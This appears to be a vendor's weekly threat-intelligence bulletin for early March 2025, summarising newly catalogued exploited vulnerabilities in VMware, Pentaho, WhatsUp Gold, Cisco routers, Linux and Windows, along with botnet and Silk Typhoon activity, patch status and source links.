The first week of March kicked off with a wave of security concerns as nine new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog. VMware ESXi, Workstation, and Fusion accounted for three of them, while Hitachi Vantara Pentaho contributed two. Meanwhile, vulnerabilities in Linux, Microsoft Windows, Cisco Small Business Routers, and Progress WhatsUp Gold further expanded the list. This surge serves as a stark reminder that attackers are actively targeting both enterprise and IT infrastructure, making timely patching and security vigilance more crucial than ever.

Botnet threats surged this week as EnemyBot and Sysrv-K exploited Spring Cloud Gateway, Andoryu leveraged a GitLab vulnerability, and Androxgh0st targeted PHP flaws. Meanwhile, Bashlite, BrickerBot, Tsunami, and Mirai ramped up attacks on Eir D1000 modems.    

Adding to the cybersecurity landscape, researchers observed a strategic shift in Silk Typhoon’s operations, with the group recently leveraging a zero-day vulnerability in Ivanti Pulse Connect VPN for initial access. This development reflects the evolving tactics of advanced threat actors, reinforcing the need for constant vigilance and adaptive security strategies.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2025-22224

A critical Time-of-Check Time-of-Use (TOCTOU) Vulnerability has been discovered in VMware ESXi and Workstation, carrying a CVSS Score of 9.3. This flaw exploited as zero-day affects ESXi versions 8.0, 7.0, and 6.7, as well as Workstation 17.x. An attacker with local authentication and administrative privileges can exploit this vulnerability to execute arbitrary code within the virtual-machine executable (VMX) process, potentially compromising system integrity. Broadcom has released patches to mitigate the risk, and the vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.  

CVE-2025-22225

An Arbitrary Write Vulnerability has been identified in VMware ESXi, carrying a high CVSS Score of 8.2. This flaw has been actively exploited as zero-day, allowing attackers to manipulate memory and potentially execute arbitrary code. In response, Broadcom has released patched versions of VMware ESXi, and the vulnerability has been added to the CISA KEV catalog, highlighting its critical nature.  

CVE-2025-22226

An Information Disclosure Vulnerability affecting VMware ESXi versions 8.0, 7.0, and 6.7, Workstation17.x and Fusion 13.x. has been actively exploited as zero-day, allowing unauthorized access to sensitive data. Broadcom has released patched versions, of VMware ESXi, VMware Workstation 17.6.3 and VMware Fusion 13.6.3, to address the issue. The vulnerability has been included in the CISA KEV catalog emphasizing the need for immediate remediation.  

CVE-2024-4885

A critical Path Traversal Vulnerability with a CVSS Score of 9.8 has been discovered in Progress WhatsUp Gold, impacting versions prior to 2023.1.3. This flaw allows unauthenticated attackers to execute remote code, posing a severe security risk. The Shadowserver foundation has detected active exploitation attempts of this vulnerability since August 2024. Additionally, GreyNoise has identified at least eight unique IP addresses from regions including Hong Kong, Russia, Brazil, South Korea and U.K as sources of malicious activity targeting this vulnerability. This vulnerability has also been added to the CISA KEV catalog recently.  

‍CVE-2024-50302

A Use of Uninitialized Resource Vulnerability with a high CVSS score of 7.8 has been identified in the Linux Kernel. Google has addressed this issue in the Android Security Bulletin for March 2025 and has warned of indications of limited, targeted exploitation, though specific attack details were not disclosed. A report from Amnesty International suggest that this vulnerability was likely exploited as zero-day by Cellebrite's mobile forensic tools to bypass the lock screen of an Android device belonging to a Serbian student activist. This flaw was reportedly part of a broader Android zero-day exploit chain developed by Cellebrite to unlock confiscated devices. The vulnerability has also been added to the CISA KEV catalog prompting organizations to prioritize pathing efforts to minimize exposure.  

‍CVE-2023-20118

A Remote Code Execution Vulnerability with a high CVSS Score of 7.2, has been identified in Cisco Small Business router models RV016, RV042, RV042G, RV082, RV320, and RV325. This flaw enables attackers to deploy a webshell on the target router. Cisco has confirmed that the vulnerability remains unpatched as the affected routers have reached end-of-life (EoL) status. Recent investigations from Sekoia team revealed that PolarEdge botnet, a sophisticated IoT-based malware campaign active since at least 2023, has infected over 2000 devices globally by exploiting this vulnerability. Given the risk of active exploitation, the vulnerability has been listed in the CISA KEV catalog.

‍CVE-2022-43769

A Special Element Injection Vulnerability with a high CVSS Score of 8.8 has been identified in Hitachi Vantara Pentaho Business Analytics Server, affecting versions prior to 9.4.0.1, prior to 9.3.0.2, and 8.3.0.0. If exploited, an attacker could inject Spring templates into properties files, leading to arbitrary command execution. To mitigate the risk, Hitachi Vantara recommends upgrading to Pentaho 9.4 with Service Pack 9.4.0.1 or applying Service Pack 9.3.0.2 or later for version 9.3. Acknowledging its threat potential, CISA has incorporated this vulnerability into its KEV catalog.  

‍CVE-2022-43939

A critical Authorization Bypass Vulnerability with a CVSS Score of 9.8, has been identified in Hitachi Vantara Pentaho Business Analytics Server, affecting versions prior to 9.4.0.1, prior to 9.3.0.2, and 8.3.0.0. The vulnerability arises from the use of non-canonical URL paths for authorization decisions, allowing an attacker to bypass authorization controls and gain unauthorized access to sensitive functions or data. To address this issue, Hitachi Vantara released Pentaho Business Analytics Server 9.3.0.2 (LTS), 9.4.0.1, and later versions in August 2024. Due to its active exploitation, CISA has included this vulnerability in the Known Exploited Vulnerabilities (KEV) catalog.  

‍CVE-2018-8639

An Improper Resource Shutdown or Release Vulnerability has been identified in Microsoft Windows Win32K. If successfully exploited, an attacker could execute arbitrary code in kernel mode, enabling them to install programs, modify or delete data, and create new accounts with full user privileges. Microsoft released a security update in December 2018 to address this issue. However, in February 2023, AhnLab reported that the China-based APT group Dalbit (m00nlight) had actively exploited this vulnerability to escalate privileges on compromised systems, gaining higher access and control. This flaw has now been included in the CISA KEV catalog.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.  

CVE-2025-0282

Microsoft Threat Intelligence has observed tactical shift in the operations of Silk Typhoon, a Chinese espionage group, which now focuses on exploiting common IT solutions such as remote management tools and cloud applications to gain initial access. In January 2025, the group was also found leveraging CVE-2025-0282, a zero-day vulnerability in the public-facing Ivanti Pulse Connect VPN. Upon identifying this activity, the Microsoft Threat Intelligence Center promptly reported the issue to Ivanti, leading to a swift resolution of the critical exploit. This rapid response significantly minimized the window of opportunity for advanced threat actors to exploit the vulnerability.  

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/03/04/cisa-adds-four-known-exploited-vulnerabilities-catalog  
2. https://www.cisa.gov/news-events/alerts/2025/03/03/cisa-adds-five-known-exploited-vulnerabilities-catalog  
3. https://source.android.com/docs/security/bulletin/2025-03-01  
4. https://securitylab.amnesty.org/latest/2025/02/cellebrite-zero-day-exploit-used-to-target-phone-of-serbian-student-activist/  
5. https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024  
6. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25390